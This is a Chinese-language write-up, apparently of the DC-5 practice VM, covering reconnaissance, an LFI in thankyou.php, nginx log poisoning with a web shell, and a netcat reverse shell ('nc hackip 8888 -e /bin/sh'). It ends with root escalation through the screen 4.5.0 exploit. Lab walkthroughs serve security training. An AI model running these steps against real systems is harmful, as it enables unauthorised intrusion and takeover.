1.信息收集

扫描主机

sudo arp-scan -l

扫描端口

nmap -p- 192.168.42.149

扫描指纹

whatweb 192.168.42.149

查看端口详细服务

nmap -A -p- -v 192.168.42.149

2.网站分析

扫描目录

dirbuster

浏览网站,发现都是静态页面

只有contact.php有上传窗口

尝试上传,发现问题copyright旁的数字发生变化,猜测thankyou.php存在文件包含

包含文件为footer.php

3.漏洞利用

开始bp测试字段(下面没图了,bp爆破,网站日志太大,无法连接蚁剑,建议大家在此靶场不要跑bp)

thankyou.php?file=/ect/passwd

植入一句话木马

thankyou.php?file=

由于前面信息收集我们确认了是nginx的站,访问日志和错误日志应该如下

/var/log/nginx/access.log

/var/log/nginx/error.log

文件包含,蚁剑连接shell

thankyou.php?file=/var/log/nginx/error.log

cmd

将shell反弹到kali上便于操作

s:nc hackip 8888 -e /bin/sh

监听

hack:nc -lvp 8888

优化界⾯

python -c "import pty;pty.spawn('/bin/bash')"

4.提升权限

提权常规命令

sudo -l

find / -perm -u=s -type f 2>/dev/null

提权命令网站

https://gtfobins.github.io/

发现screen 4.5.0,查找他的漏洞

searchsploit screen 4.5.0

searchsploit -m linux/local/41154.sh

真实目录

usr/share/exploitdb/exploits/linux/local/41154.sh

然后在桌面上用vim打开文件

发现脚本由三部分组成,两个c文件,一个命令集,拆分为三部分

kali监听端口

python -m SimpleHTTPServer 8000

攻击机在kali上下载脚本

“wget 192.168.42.149:8888/libhax.c wget 192.168.42.149:8888/rootshell.c wget 192.168.42.149:8888/dc5.sh`

gcc -fPIC -shared -ldl -o libhax.so libhax.c

gcc -o rootshell rootshell.c

chmod +x dc5.sh

./dc5.sh

提权成功
(后面会在做一次,补一下图片)